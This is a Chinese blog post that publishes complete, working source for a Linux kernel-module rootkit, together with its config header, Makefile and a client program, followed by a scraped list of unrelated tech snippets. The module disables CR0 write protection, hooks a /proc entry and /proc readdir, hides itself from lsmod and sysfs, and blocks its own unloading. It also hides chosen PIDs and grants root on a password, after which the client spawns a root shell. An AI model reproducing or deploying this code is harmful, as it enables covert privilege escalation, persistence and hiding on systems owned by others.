rootkit:在隐藏模块的基础上隐藏进程

        上篇随笔中实现了隐藏进程,在实际的处理中,经常会用模块来达到修改系统调用的目的,但是当插入一个模块时,若不采取任何隐藏措施,很容易被对方发现,一旦对方发现并卸载了所插入的模块,那么所有利用该模块来隐藏的文件就暴露了,所以应继续分析如何来隐藏特定名字的模块。

        这里我们可以通过/proc文件系统来向内核传递命令的方式,实现获取root权限、隐藏模块、隐藏进程、显示进程、显示模块、允许卸载模块等功能。

       对于什么是/proc文件系统,以及如何通过它来跟内核通信,可以参考这里: http://www.ibm.com/developerworks/cn/linux/l-proc.html

      下面直接贴代码:

     

  1 /*rootkit.c*/

  2 #include <linux/module.h>

  3 #include<linux/kernel.h>

  4 #include<linux/proc_fs.h>

  5 #include<linux/sched.h>

  6 #include<linux/string.h>

  7 #include<linux/cred.h>

  8 #include<linux/stat.h>

  9 #include<linux/uaccess.h>

 10 #include<linux/file.h>

 11 #include "rootkit_conf.h"

 12 

 13 MODULE_LICENSE("GPL") ;

 14 MODULE_AUTHOR("Ormi<[email protected]>") ;

 15 MODULE_DESCRIPTION("Simple rootkit using procfs") ;

 16 MODULE_VERSION("0.1.2");

 17 static int failed;

 18 int orig_cr0;

 19 static char pid[10][32];

 20 static int pid_index;

 21 /* Here are pointers in which we save original, replaced pointers. We use

 22 them later, during unloading the module.

 23 I think that their names explain what they are ;) */

 24 static int (*old_proc_readdir)(struct file *, void *, filldir_t);

 25 static filldir_t old_filldir ;

 26 static ssize_t (*old_fops_write) (struct file *, const char __user *,size_t, loff_t *);

 27 static ssize_t (*old_fops_read)(struct file *, char __user *, size_t, loff_t*);

 28 static write_proc_t *old_write;

 29 static read_proc_t *old_read;

 30 static struct proc_dir_entry *ptr; /* Pointer to "infected" entry */

 31 static struct proc_dir_entry *root; /* Pointer to /proc directory */

 32 static struct list_head *prev; /* Pointer to entry in main modules list whichwas before our module before we hid the rootkit */

 33 static struct file_operations *fops; /* file_operations of infected entry */

 34 static struct file_operations *root_fops; /* file_operations of /procdirectory */

 35 

 36 

 37 static unsigned int clear_and_return_cr0(void)//

 38 {

 39     unsigned int cr0 = 0;

 40     unsigned int ret;

 41 

 42     asm volatile ("movl %%cr0, %%eax"

 43             : "=a"(cr0)//eaxcr0

 44          );

 45     ret = cr0;//

 46 

 47     /*clear the 16th bit of CR0,*/

 48     cr0 &= 0xfffeffff;

 49     asm volatile ("movl %%eax, %%cr0"

 50             :

 51             : "a"(cr0)

 52          );

 53     return ret;

 54 }

 55 

 56 static void setback_cr0(unsigned int val)

 57 {

 58     asm volatile ("movl %%eax, %%cr0"

 59             :

 60             : "a"(val)

 61          );

 62 }

 63 

 64 static inline void module_remember_info(void)//save the pointer to the prev of hide module

 65 {

 66     prev = THIS_MODULE->list.prev;

 67 }

 68 static inline void module_show(void)//lsmod

 69 {

 70     list_add(&THIS_MODULE->list, prev); /* We add our module to main list of modules */

 71 }

 72 

 73 /* Parameter of this function is pointer to buffer in which there should be

 74 command */

 75 

 76 static int check_buf(const char __user *buf)

 77 {

 78     /* Here we give root privileges */

 79     struct cred *new = prepare_creds();//return current process's cred struct

 80     if (!strcmp(buf, password)) {

 81     new->uid = new->euid = 0;

 82     new->gid = new->egid = 0;

 83     commit_creds(new);

 84     }

 85 

 86     /* Here we make possible to unload the module by "rmmod" */

 87     else if (!strcmp(buf, module_release))

 88         module_put(THIS_MODULE);//count--

 89     /* Here we make module visible */

 90     else if (!strcmp(buf, module_uncover))

 91         module_show();//add to the list

 92     /* We hide process */

 93     else if (!strncmp(buf, hide_proc, strlen(hide_proc))) {

 94         if (pid_index > 9)  /*max number of the hided process is 10*/

 95         return 0;

 96         sprintf(pid[pid_index], "%s", buf + 5);

 97         pid_index++;

 98     }

 99 /* We "unhide" lastly hidden process */

100     else if (!strncmp(buf, unhide_proc, strlen(unhide_proc))) {

101         if (!pid_index)

102         return 0;

103         pid_index--;

104     }

105 /* If we are here, there was no command passed */

106     else

107         return 1;

108     return 0;

109 }

110 

111 

112 

113 /* Our "write" function */

114 static int buf_write(struct file *file, const char __user *buf,unsigned long count, void *data)

115 {

116     /* If check_buf return 0, there was command passed */

117     if (!check_buf(buf))

118         return count;

119     /* Otherwise we execute original function */

120     return old_write(file, buf, count, data);

121 }

122 

123 

124 

125 /* Our "read" function for read_proc field*/

126 static int buf_read(char __user *buf, char **start, off_t off,int count, int *eof, void *data)

127 {

128     if (!check_buf(buf))

129         return count;

130     return old_read(buf, start, off, count, eof, data);

131 }

132 

133 

134 /* For file_operations structure */

135 static ssize_t fops_write(struct file *file, const char __user *buf_user,size_t count, loff_t *p)

136 {

137     if (!check_buf(buf_user))

138         return count;

139     return old_fops_write(file, buf_user, count, p);

140 }

141 

142 

143 /* For file_operations structure */

144 static ssize_t fops_read(struct file *file, char __user *buf_user,size_t count, loff_t *p)

145 {

146     

147     if (!check_buf(buf_user))

148         return count;

149     return old_fops_read(file, buf_user, count, p);

150 }

151 

152 

153 /* Our filldir function */

154 static int new_filldir(void *__buf, const char *name, int namelen,loff_t offset, u64 ino, unsigned d_type)

155 {

156     int i;

157     /* We check if "name" is pid of one of hidden processes */

158     for (i = 0; i < pid_index; i++)

159     if (!strcmp(name, pid[i]))

160         return 0; /* If yes, we don't display it */

161     /* Otherwise we invoke original filldir */

162     return old_filldir(__buf, name, namelen, offset, ino, d_type);

163 }

164 

165 

166 

167 /* Our readdir function */

168 static int new_proc_readdir(struct file *filp, void *dirent, filldir_t filldir)

169 {

170     /* To invoke original filldir in new_filldir we have to remeber pointer to

171     original filldir */

172     old_filldir = filldir;

173     /* We invoke original readdir, but as "filldir" parameter we give pointer to

174     our filldir */

175     return old_proc_readdir(filp, dirent, new_filldir) ;

176 }

177 

178 

179 

180 /* Here we replace readdir function of /proc */

181 static inline void change_proc_root_readdir(void)

182 {

183     root_fops = (struct file_operations *)root->proc_fops;

184     old_proc_readdir = root_fops->readdir;

185 

186     root_fops->readdir = new_proc_readdir;

187     

188 }

189 

190 

191 static inline void proc_init(void)//commond

192 {

193     ptr = create_proc_entry("temporary", 0444, NULL);

194     ptr = ptr->parent;

195     /* ptr->parent was pointer to /proc directory */

196     /* If it wasn't, something is seriously wrong */

197     if (strcmp(ptr->name, "/proc") != 0) {

198         failed = 1;

199         return;

200     }

201     root = ptr;

202     remove_proc_entry("temporary", NULL);

203     

204     orig_cr0 = clear_and_return_cr0();

205     change_proc_root_readdir(); /* We change /proc's readdir function */

206     setback_cr0(orig_cr0); /*set the wp*/

208     ptr = ptr->subdir;

209     /* Now we are searching entry we want to infect */

210     while (ptr) {

211         if (strcmp(ptr->name, passwaiter) == 0)

212         goto found; /* Ok, we found it */

213         ptr = ptr->next; /* Otherwise we go to next entry */

214     }

215     /* If we didn't find it, something is wrong :( */

216     failed = 1;

217     return;

218 found:

219     /* Let's begin infecting */

220     /* We save pointers to original reading and writing functions, to restore them during unloading the rootkit */

221     old_write = ptr->write_proc;

222     old_read = ptr->read_proc;

223     fops = (struct file_operations *)ptr->proc_fops; /* Pointer tofile_operations structure of infected entry */

224     old_fops_read = fops->read;

225     old_fops_write = fops->write;

226     

227     orig_cr0 = clear_and_return_cr0();  /*set back the wp*/

228     

229     /* We replace write_proc/read_proc */

230     if (ptr->write_proc)

231         ptr->write_proc = buf_write;

232     else if (ptr->read_proc)

233         ptr->read_proc = buf_read;

234         

235     /* We replace read/write from file_operations */

236     if (fops->write)

237         fops->write =fops_write;

238      else if (fops->read)

239         fops->read = fops_read;

240         

241     setback_cr0(orig_cr0);

242     /* There aren't any reading/writing functions? Error! */

243     if (!ptr->read_proc && !ptr->write_proc &&!fops->read && !fops->write) {

244         failed = 1;

245         return;

246     }

247 }

248 

249 

250 /* This functions does some "cleanups". If we don't set some pointers tu

251 NULL,

252 we can cause Oops during unloading rootkit. We free some structures,

253 because we don't want to waste memory... */

254 static inline void tidy(void)

255 {

256     kfree(THIS_MODULE->notes_attrs);

257     THIS_MODULE->notes_attrs = NULL;

258     kfree(THIS_MODULE->sect_attrs);

259     THIS_MODULE->sect_attrs = NULL;

260     kfree(THIS_MODULE->mkobj.mp);

261     THIS_MODULE->mkobj.mp = NULL;

262     THIS_MODULE->modinfo_attrs->attr.name = NULL;

263     kfree(THIS_MODULE->mkobj.drivers_dir);

264     THIS_MODULE->mkobj.drivers_dir = NULL;

265 }

266 

267 

268 

269 /*

270 We must delete some structures from lists to make rootkit harder to detect.

271 */

272 static inline void rootkit_hide(void)

273 {

274     list_del(&THIS_MODULE->list);//lsmod,/proc/modules

275     kobject_del(&THIS_MODULE->mkobj.kobj);// /sys/modules

276     list_del(&THIS_MODULE->mkobj.kobj.entry);// kobj struct list_head entry

277 }

278 

279 

280 static inline void rootkit_protect(void)

281 {

282     try_module_get(THIS_MODULE);// count++

283 }

284 

285 

286 static int __init rootkit_init(void)

287 {

288     module_remember_info();

289     proc_init();

290     if (failed)

291         return 0;

292     rootkit_hide();

293     tidy();

294     rootkit_protect();

295     return 0 ;

296 }

297 

298 

299 

300 static void __exit rootkit_exit(void)

301 {

302     /* If failed, we don't have to do any cleanups */

303     if (failed)

304         return;

305     orig_cr0 = clear_and_return_cr0();

306     root_fops->readdir = old_proc_readdir;

307     fops->write = old_fops_write;

308     fops->read = old_fops_read;

309     ptr->write_proc = old_write;

310     ptr->read_proc = old_read;

311     setback_cr0(orig_cr0);

312 }

313 

314 

315 module_init(rootkit_init);

316 module_exit(rootkit_exit);

命令头文件:

1 /*rootkit_conf.h*/

2 static char password[] = "secretpassword" ; //give here password

3 static char passwaiter[] = "version" ; //here is name of entry to infect in /proc - you pass commands to it

4 static char module_release[] = "release" ; //command to release the module(make possible to unload it)

5 static char module_uncover[] = "uncover" ; //command to show the module

6 static char hide_proc[] = "hide" ; //command to hide specified process

7 static char unhide_proc[] = "unhide"; //command to "unhide" last hidden process

对应的Makefile

1 KERNELDIR=/usr/src/linux-headers-3.2.0-39-generic-pae

2 PWD:=$(shell pwd)

3 obj-m :=rootkit.o

4 modules:

5     $(MAKE) -C $(KERNELDIR) M=$(PWD) modules

6 clean:

7     rm -rf *.o *~ core .depend .*.cmd *.ko *.mod.c *.order *.symvers

测试程序:

 1 /*test_rootkit.c*/

 2 #include<stdio.h>

 3 #include<unistd.h>

 4 #include<fcntl.h>

 5 #include<string.h>

 6 #include<errno.h>

 7 #include<sys/stat.h>

 8 #include "rootkit_conf.h"

 9 static char file[64];

10 static char command[64];

11 int root = 0;

12 int main(int argc, char *argv[])

13 {

14     if(argc < 2) 

15     {

16         fprintf(stderr, "Usage: %s <command>\n", argv[0]);

17         return 1;

18     }

19     int fd ;

20     /* We get path to infected entry */

21     sprintf(file, "/proc/%s", passwaiter);

22     

23     /* If sent command is equal to command which has to give us root, we must run shell at the end */

24     if(!strcmp(argv[1], password))

25         root = 1;

26         

27     /* At first we try to write command to that entry */

28     fd = open(file, O_WRONLY);

29     if(fd < 1) 

30     {

31         printf("Opening for writing failed! Trying to open for reading!\n");

32         /* Otherwise, we send command by reading */

33         fd = open(file, O_RDONLY);

34         if(!fd) {

35             perror("open");

36         return 1;

37         }

38         read(fd, argv[1], strlen(argv[1]));

39     }

40     else

41       write(fd, argv[1], strlen(argv[1]));

42 end:

43     close(fd) ;

44     printf("[+] I did it!\n") ;

45     /* if we have to get root, we run shell */

46     if(root) {

47         uid_t uid = getuid() ;

48         printf("[+] Success! uid=%i\n", uid) ;

49         setuid(0) ;

50         setgid(0) ;

51         execl("/bin/bash", "bash", 0) ;

52     }

53     return 0;

54 }

编译生成模块 rootkit.ko,并加载进内核

默认情况下,我们已经隐藏了模块rootkit.ko 所以不管是 lsmod 还是 ls /proc/modules 或则 ls /sys/modules 是看不到rootkit.ko的。

此时编译运行test_rootkit.c

并传入参数:1:secretpassword 此时可以获得root权限

                     2:uncover  此时运行lsmod可以查看到模块rootkit.ko

                     3:  release   此时才可以用rmmode卸载模块rootkit.ko,默认情况下是不可以卸载的,因为我们在模块里设置了正在使用模块标记count=1,所以必须传命令release 让count=0,这样才可以卸载

                    4:hide:12   此时就可以隐藏进程号为12的进程

                    5:unhide     此时就可以显示最近隐藏的进程

 

你可能感兴趣的:(root)

  • 成功解决 -bash:***: command not found 方永 Linuxbashcentoslinux
    1、获取系统环境路径[root@centos~]#echo$PATH/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin2、修改~/.bash_profile,在最后添加环境变量[root@centos~]#cd~[root@centos~]#vim~/.bash_profile###在底部加上上面获取的路径e
  • mysql mha自动切换_mha+mysql自动切换 佐罗 先生 mysqlmha自动切换
    manager:192.168.2.254master:192.168.2.252slave:192.168.2.253VIP:192.168.2.144操作系统:centos6.564位1.配置ssh互信(root用户每台都执行)#ssh-keygen#ssh-copy-id192.168.2.252#ssh-copy-id192.168.2.253#ssh-copy-id192.168.2.2
  • Percona-toolkit工具详解 小一_d28d
    1.pt工具安装[root@master~]#yuminstall-ypercona-toolkit-3.1.0-2.el7.x86_64.rpm2.常用工具使用介绍2.1pt-archiver归档表#重要参数--limit100每次取100行数据用pt-archive处理--txn-size100设置100行为一个事务提交一次,--where'id>/root/db/checksum.logpt
  • 使用docker部署考试系统 汪公子492 docker
    web--拉取nginx--挂载项目文档dist--dockerrun-itd-v/root/pes/web/dist/:/usr/share/nginx/html-p80:80nginx:latest配置mysql服务--拉取mysql:5.7.44镜像--创建容器测试dockerrun-itd-p3306:3306-eMYSQL_ROOT_PASSWORD=rootmysql:5.7.44do
  • Spring-bean的生命周期-中篇 码农小伙 Springspringjava后端
    阶段4:BeanDefinition合并阶段合并阶段是做什么的?可能我们定义bean的时候有父子bean关系,此时子BeanDefinition中的信息是不完整的,比如设置属性的时候配置在父BeanDefinition中,此时BeanDefinition中是没有这些信息的,需要将子bean的BeanDefinition和父beanBeanDefinition进行合并,得到最终的一个RootBean
  • mysql数字转换中文版_mysql 阿拉伯数字转换中文函数 七焱 mysql数字转换中文版
    CREATEDEFINER=`root`@`%`FUNCTION`sp_cn`(n_LowerMoneydecimal(15,2))RETURNSvarchar(200)CHARSETutf8beginDeclarev_LowerStrVARCHAR(200);Declarev_UpperPartVARCHAR(200);Declarev_UpperStrVARCHAR(200);Declarei
  • MySQL笔记DCL-待续(密码、权限) 乐瓜乐虫 数据库笔记
    什么是DCL数据控制语言?数据控制语言(DCL:DataControlLanguage)是用来设置或者更改数据库用户或角色权限的语句,这些语句包括GRANT、DENY、REVOKE等语句mysql限制root用户指定ip登录查看root用户可以在哪台机器登录selectuser,hostfrommysql.userwhereuser='root';修改mysql库里边的user表updatemys
  • linux autofs配置 crazysele linux服务器运维
    安装yuminstall-yautofs准备挂接目录mkdir/nfsdatamkdir/nfsdata/{tools,files}添加配置echo“/nfsdata/etc/auto.user”>>/etc/auto.masterecho“tools-fstype=nfs,rw,sync,no_root_squash172.23.0.187:/mnt/sdb1/tools”>>/etc/auto
  • Linux-------基础 Pluto & Ethereal linux运维服务器
    目录一、基础1、Linux的特点:2、UbuntuLinux的特点:3、用户切换的命令4、常用命令一、基础1、Linux的特点:开放性、安全性、多用户性、网络性2、UbuntuLinux的特点:1、拥有完整图形化界面,是面向普通用户对象,比较容易上手2、安装UbuntuLinux会自带unity桌面环境,操作方便3、用户切换的命令su用户名切换到对应的用户sudo-i切换到root(超级管理员)4
  • linux编码格式修改 小僵123456 linuxlinux运维服务器
    linux编码格式修改1、全局修改(root用户下的修改)(1)登录root用户(2)vi/etc/profile(3)打开文件后在最后两行加入如下命令:exportLC_ALL=“zh_CN.UTF-8”exportLANG=“zh_CN.UTF-8”(4)使文件生效source/etc/profile2、局部修改(普通用户下的修改)(1)登录uacsapp用户(2)vi/home/uacsap
  • flink独立集群部署 嘎子吱吱吱吱 flinkhadooplinux
    #flink独立集群部署说明安装环境三台服务器47.106.23.1(master)47.112.173.2(worker1)47.115.162.3(worker1)提前装好jdk和ssh,以下操作最好不要用root账号提前下载好flink的包并解压设置三台服务器之间ssh免密登录生成本机秘钥以47.106.23.1为例(其他两台参考本服务器)#生成本机秘钥cd;ssh-keygen-trsa-
  • linux虚拟机设置静态ip并访问外网 却诚Salong 安装问题和解决方法linuxtcp/ip服务器
    需求:需要用vmware做虚拟机集群,但是前提是保证每个节点的ip固定,而且还要联网。1.先确保你的动态ip状况下可以正常ping通外网,具体怎么配置这里不做详细解释。2.在windows系统应用中打开虚拟网络编辑器,查看网关ip。3.然后在linux虚拟机中输入ifconfig,查看linux的ip地址[root@localhostnetwork-scripts]#ifconfigens33:f
  • MYSQL数据库的实验总结_MySQL数据库基础总结 weixin_39993623 MYSQL数据库的实验总结
    来源:实验楼链接:https://www.shiyanlou.com/courses/9一、开发准备#打开MySQL服务sudoservicemysqlstart#使用root用户登录,密码为空mysql-uroot二、查看数据库SHOWDATABASES三、新建数据库首先,我们创建一个数据库,给它一个名字,比如mysql_shiyan,以后的几次实验也是对mysql_shiyan这个数据库进行操
  • 深度学习目标检测入门COCO数据集 日暮途远z 深度学习目标检测人工智能
    常见数据集类型:COCO数据集:Pytorch加载COCO数据集:COCO数据集的读取COCO_dataset=torchvision.datasets.CocoDetection(root="./dataset/val2017",annFile="./instances_val2017/instances_val2017.json")root(strorpathlib.Path)–Rootdir
  • 因MathType导致word复制粘贴失败,显示:运行时错误‘53’ 小白一枚~~~ word
    问题:运行时错误‘53’:文件未找到:MathPage.WLL解决方法:打开MathType所在文件夹右击MathType图标->点击“打开文件所在位置”->找到MathPage.WLL文件。然后,把这个文件复制到该目录下:C:\ProgramFiles\MicrosoftOffice\root\Office16该解决方法参考:https://blog.csdn.net/Seeyouer/arti
  • Windows CE 5.0电池驱动剖析 技术无疆 WindowsCEwindowsbyte硬件驱动system数据结构工作
    一.概述WindowsCE电池驱动属于分层驱动,由MDD层和PDD层组成。驱动示例代码位于%_WINCEROOT%/Public/Common/Oak/Drivers/Battdrvr。其中battdrvr.c是MDD层代码,sbattif.c是PDD层代码。MDD层代码微软已经搭好架构,一般不需要修改,我们要实现的是PDD层的代码。二.MDD层电池驱动对外接口函数没有“BAT_”前缀,因为HKE
  • Linux下 普通用户sudo “is not in the sudoers file”解决方法 小刘同学++ linux
    当我们使用sudo命令切换用户的时候可能会遇到提示以下错误:用户名isnotinthesudoersfile.原因当前的用户没有加入到sudo的配置文件里解决方案#切换到root用户su#编辑配置文件vim/etc/sudoers#增加配置,在打开的配置文件中,找到rootALL=(ALL)ALL,在下面添加一行#其中xxx是你要加入的用户名称xxxALL=(ALL)ALL
  • 【数据结构】python实现二叉树 汨攸 笔记python数据结构算法
    文章目录@[TOC](文章目录)一、二叉树的概念二、python代码1.定义抽象类2.定义结点类3.实现二叉树基本操作4.删除操作中用到的两个外部函数5.测试一、二叉树的概念二叉树是n个有限元素的集合,该集合或者为空、或者由一个称为根(root)的元素及两个不相交的、被分别称为左子树和右子树的二叉树组成,是有序树。当集合为空时,称该二叉树为空二叉树。在二叉树中,一个元素也称作一个节点二、pytho
  • 新的Ubuntu服务器如何启用root账号和配置静态ip以及开启ssh服务 jjw_zyfx 配置服务器ubuntussh
    1、首先启用root账号1、先用默认账户登录进服务器2、使用命令启用root账号sudopasswdroot3、输入以上命令并回车后会让重新输入root账号密码重新设置root账户密码即可。4、切换到root账号suroot5、输入刚才设置的root账号密码并回车,此时可以看到用户已经更改为root2、配置静态IP1、在root账号下使用vim打开/etc/netplan/00-installer
  • Ubuntu的ssh 请不要问我是谁
    安装sshsudoapt-getupdatesudoapt-getinstallopenssh-server检测ssh是否启动sudops-e|grepssh创建root用户sudopasswdroot配置本机无密码ssh登录cd/home/spark0ssh-keygen-trsa-P""cat.ssh/id_rsa.pub>>.ssh/authorized_keyschmod600.ssh/a
  • 【已恢复】服务器MySQL被入侵,数据丢失恢复 第四维度4 关于我买了台阿里云服务器mysql服务器数据库linuxdatabase
    背景:当时在宝塔安装了MySQL5.7,然后当时只是测试,就直接设置用户名和密码为root,今天在Navicat突然登录不上了,于是在linux下登录MySQL,只剩下一个ReadMe文件,于是打开看了一下:以下数据库已被删除:dbeco。我们有完整的备份。要恢复它,您必须向我们的比特币地址xxxx支付xx比特币(BTC)。如果您需要证明,请通过以下电子邮件与我们联系。[email protected]。任何
  • kubernetes online depoly | kubeadm 快速部署kubernetes v1.25 集群 |单matser 深耕云原生 kuberneteskubernetes容器云原生
    目录一、环境准备二、安装Containerd三、安装Kubernetes四、部署网络插件一、环境准备软件环境:操作系统AlmaLinux9容器引擎ContainerdKubernetes1.25服务器规划:k8s-master192.168.200.11k8s-node1192.168.200.12k8s-node2192.168.200.13查看系统内核#查看当前系统的版本:[root@k8s-
  • Kafka2.8.0集群安装教程 请叫我你好 安装教程kafka
    Kafka2.8.0集群安装教程准备工作node01~node04(四个节点机器,三台也可以),kafka安装node01~~node03启动zookeeper,这里依次启动node131,node132,node133上的zk。(关于zookeeper集群安装请看https://blog.csdn.net/qq_41578037/article/details/123809220)[root@n
  • 145-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务 dreamer292 #小迪安全学习笔记网络安全安全web安全系统安全
    参考【权限维持】Linux&Rootkit后门&Strace监控&Alias别名&Cron定时任务_aliasls='alerts(){ls$*--color=auto;python-c"-CSDN博客参考FlowUs息流-新一代生产力工具权限维持-Linux-定时任务-Cron后门利用系统的定时任务功能进行反弹Shell1、编辑后门反弹shell脚本vim/etc/.xiaodi.sh内容:#!
  • Docker使用示例 Please_Yes DockerJavadockerlinux
    Docker使用示例1.Docker安装MySQL下载MySQL镜像dockerpullmysql:latest(安装的是mysql8.0)启动mysql容器dockerrun-p3307:3306-eMYSQL_DATABASE=workdb-eMYSQL_ROOT_PASSWORD=123456-dmysql进入容器(命令行)dockerexec-itf839d00b0b21bash登录mys
  • mac m2芯片docker打镜像 Whitess007 dockermacosm1m2arm64amd64
    这里写自定义目录标题问题解决问题本机是m2芯片是arm64的架构,gs线上运行环境不支持!!!解决看了很多文章,用dockerrun--platform的,线上也不给你那么运行啊。。最后,就是先拉取amd64的镜像版本,再去打包。比如我的项目是分为前后端两个文件夹的,目录大致如下:root(项目根目录)backDockerfilefrontDockerfileindex.html...docker
  • Proto3:File Location - 文件位置 Upping8
    Prefernottoput.protofilesinthesamedirectoryasotherlanguagesources.Considercreatingasubpackageprotofor.protofiles,undertherootpackageforyourproject.如果不喜欢将.proto文件和其他语言资源放在同一个目录中。考虑在工程根包下为.proto文件创建一个子包
  • 【python日用】scipy.optimize.root用法及代码示例 桑桑在路上 python日用python
    定义defroot(fun,x0,args=(),method='hybr',jac=None,tol=None,callback=None,options=None):"""Findarootofavectorfunction.查找向量函数的根Parameters----------fun:callableAvectorfunctiontofindarootof.查找根的向量函数x0:ndarr
  • 轻量化部署工具Docker:参数化启动容器与数据卷挂载的综合应用 8tydegrees dockerdocker容器运维
    dockerrun中的常见参数以mysql安装为例子dockerrun-d\--namemysql\-p3306:3306\-eTZ=Asia/Shanghai\-eMYSQL_ROOT_PASSWORD=123456\mysql-d表示后台执行–name容器的名字-p宿主机和容器映射的端口-e环境变量的设置此处设置了时区和密码最下方的mysql指此镜像名字(官方名字)一般此处的镜像名称结构是Re
  • MySQL 报错: “Host ‘xxx‘ is not allowed to connect to this MySQL server“ 不爱开发的干饭人 mysql数据库
    1.使用MySQL命令行工具登录到MySQL服务器上。使用mysql命令行工具以root用户或具有足够权限的用户身份登录。mysql-uroot-p输入密码后,选择mysql数据库。usemysql;查看当前的用户和权限设置selecthost,userfromuser;更新对应用户的权限,允许从任何主机连接。updateusersethost='%'whereuser='your_usernam
  • HttpClient 4.3与4.3版本以下版本比较 spjich javahttpclient
    网上利用java发送http请求的代码很多,一搜一大把,有的利用的是java.net.*下的HttpURLConnection,有的用httpclient,而且发送的代码也分门别类。今天我们主要来说的是利用httpclient发送请求。 httpclient又可分为 httpclient3.x httpclient4.x到httpclient4.3以下 httpclient4.3
  • Essential Studio Enterprise Edition 2015 v1新功能体验 Axiba .net
    概述:Essential Studio已全线升级至2015 v1版本了!新版本为JavaScript和ASP.NET MVC添加了新的文件资源管理器控件,还有其他一些控件功能升级,精彩不容错过,让我们一起来看看吧! syncfusion公司是世界领先的Windows开发组件提供商,该公司正式对外发布Essential Studio Enterprise Edition 2015 v1版本。新版本
  • [宇宙与天文]微波背景辐射值与地球温度 comsci 背景
            宇宙这个庞大,无边无际的空间是否存在某种确定的,变化的温度呢?      如果宇宙微波背景辐射值是表示宇宙空间温度的参数之一,那么测量这些数值,并观测周围的恒星能量输出值,我们是否获得地球的长期气候变化的情况呢?   &nbs
  • lvs-server 男人50 server
    #!/bin/bash # # LVS script for VS/DR # #./etc/rc.d/init.d/functions # VIP=10.10.6.252 RIP1=10.10.6.101 RIP2=10.10.6.13 PORT=80 case $1 in start)   /sbin/ifconfig eth2:0 $VIP broadca
  • java的WebCollector爬虫框架 oloz 爬虫
    WebCollector主页: https://github.com/CrawlScript/WebCollector 下载:webcollector-版本号-bin.zip将解压后文件夹中的所有jar包添加到工程既可。 接下来看demo package org.spider.myspider; import cn.edu.hfut.dmic.webcollector.cra
  • jQuery append 与 after 的区别 小猪猪08
    1、after函数 定义和用法: after() 方法在被选元素后插入指定的内容。 语法: $(selector).after(content) 实例: <html> <head> <script type="text/javascript" src="/jquery/jquery.js"></scr
  • mysql知识充电 香水浓 mysql
    索引 索引是在存储引擎中实现的,因此每种存储引擎的索引都不一定完全相同,并且每种存储引擎也不一定支持所有索引类型。 根据存储引擎定义每个表的最大索引数和最大索引长度。所有存储引擎支持每个表至少16个索引,总索引长度至少为256字节。 大多数存储引擎有更高的限制。MYSQL中索引的存储类型有两种:BTREE和HASH,具体和表的存储引擎相关; MYISAM和InnoDB存储引擎
  • 我的架构经验系列文章索引 agevs 架构
    下面是一些个人架构上的总结,本来想只在公司内部进行共享的,因此内容写的口语化一点,也没什么图示,所有内容没有查任何资料是脑子里面的东西吐出来的因此可能会不准确不全,希望抛砖引玉,大家互相讨论。 要注意,我这些文章是一个总体的架构经验不针对具体的语言和平台,因此也不一定是适用所有的语言和平台的。 (内容是前几天写的,现附上索引)   前端架构 http://www.
  • Android so lib库远程http下载和动态注册 aijuans andorid
    一、背景      在开发Android应用程序的实现,有时候需要引入第三方so lib库,但第三方so库比较大,例如开源第三方播放组件ffmpeg库, 如果直接打包的apk包里面, 整个应用程序会大很多.经过查阅资料和实验,发现通过远程下载so文件,然后再动态注册so文件时可行的。主要需要解决下载so文件存放位置以及文件读写权限问题。   二、主要
  • linux中svn配置出错 conf/svnserve.conf:12: Option expected 解决方法 baalwolf option
    在客户端访问subversion版本库时出现这个错误: svnserve.conf:12: Option expected 为什么会出现这个错误呢,就是因为subversion读取配置文件svnserve.conf时,无法识别有前置空格的配置文件,如### This file controls the configuration of the svnserve daemon, if you##
  • MongoDB的连接池和连接管理 BigCat2013 mongodb
    在关系型数据库中,我们总是需要关闭使用的数据库连接,不然大量的创建连接会导致资源的浪费甚至于数据库宕机。这篇文章主要想解释一下mongoDB的连接池以及连接管理机制,如果正对此有疑惑的朋友可以看一下。 通常我们习惯于new 一个connection并且通常在finally语句中调用connection的close()方法将其关闭。正巧,mongoDB中当我们new一个Mongo的时候,会发现它也
  • AngularJS使用Socket.IO bijian1013 JavaScriptAngularJSSocket.IO
            目前,web应用普遍被要求是实时web应用,即服务端的数据更新之后,应用能立即更新。以前使用的技术(例如polling)存在一些局限性,而且有时我们需要在客户端打开一个socket,然后进行通信。         Socket.IO(http://socket.io/)是一个非常优秀的库,它可以帮你实
  • [Maven学习笔记四]Maven依赖特性 bit1129 maven
    三个模块 为了说明问题,以用户登陆小web应用为例。通常一个web应用分为三个模块,模型和数据持久化层user-core, 业务逻辑层user-service以及web展现层user-web, user-service依赖于user-core user-web依赖于user-core和user-service   依赖作用范围  Maven的dependency定义
  • 【Akka一】Akka入门 bit1129 akka
    什么是Akka Message-Driven Runtime is the Foundation to Reactive Applications In Akka, your business logic is driven through message-based communication patterns that are independent of physical locatio
  • zabbix_api之perl语言写法 ronin47 zabbix_api之perl
    zabbix_api网上比较多的写法是python或curl。上次我用java--http://bossr.iteye.com/blog/2195679,这次用perl。for example: #!/usr/bin/perl use 5.010 ; use strict ; use warnings ; use JSON :: RPC :: Client ; use
  • 比优衣库跟牛掰的视频流出了,兄弟连Linux运维工程师课堂实录,更加刺激,更加实在! brotherlamp linux运维工程师linux运维工程师教程linux运维工程师视频linux运维工程师资料linux运维工程师自学
    比优衣库跟牛掰的视频流出了,兄弟连Linux运维工程师课堂实录,更加刺激,更加实在!   ----------------------------------------------------- 兄弟连Linux运维工程师课堂实录-计算机基础-1-课程体系介绍1 链接:http://pan.baidu.com/s/1i3GQtGL 密码:bl65   兄弟连Lin
  • bitmap求哈密顿距离-给定N(1<=N<=100000)个五维的点A(x1,x2,x3,x4,x5),求两个点X(x1,x2,x3,x4,x5)和Y( bylijinnan java
    import java.util.Random; /** * 题目: * 给定N(1<=N<=100000)个五维的点A(x1,x2,x3,x4,x5),求两个点X(x1,x2,x3,x4,x5)和Y(y1,y2,y3,y4,y5), * 使得他们的哈密顿距离(d=|x1-y1| + |x2-y2| + |x3-y3| + |x4-y4| + |x5-y5|)最大
  • map的三种遍历方法 chicony map
    package com.test; import java.util.Collection; import java.util.HashMap; import java.util.Iterator; import java.util.Map; import java.util.Set; public class TestMap { public static v
  • Linux安装mysql的一些坑 chenchao051 linux
    1、mysql不建议在root用户下运行   2、出现服务启动不了,111错误,注意要用chown来赋予权限, 我在root用户下装的mysql,我就把usr/share/mysql/mysql.server复制到/etc/init.d/mysqld, (同时把my-huge.cnf复制/etc/my.cnf)  chown -R cc /etc/init.d/mysql
  • Sublime Text 3 配置 daizj 配置Sublime Text
